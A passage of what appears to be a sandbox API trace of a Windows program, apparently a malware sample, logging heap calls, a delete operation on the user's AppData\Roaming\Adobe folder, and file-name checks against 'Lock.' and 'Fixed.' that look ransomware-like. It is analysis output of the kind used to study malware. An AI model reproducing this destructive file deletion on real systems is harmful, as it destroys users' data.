hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0113.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0113.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0113.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0113.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0113.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0113.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0113.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0113.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0113.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0113.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0113.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb4d0 [0113.871] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Adobe", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpFilePart=0x8cf650*="Adobe") returned 0x25 [0113.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb4d0 | out: hHeap=0x2af0000) returned 1 [0113.871] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe")) returned 0x10 [0113.871] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0121.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0121.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0121.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.721] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0121.721] TranslateMessage (lpMsg=0x8cf968) returned 0 [0121.722] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0121.722] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0121.722] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0121.722] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0121.722] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.722] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0121.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0121.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0121.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bNDu1R0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NDu1R0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Du1R0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u1R0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1R0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FYJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0121.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jg.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0121.723] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0121.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0121.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0121.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bNDu1R0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NDu1R0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Du1R0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u1R0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1R0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FYJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJg.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jg.wav", 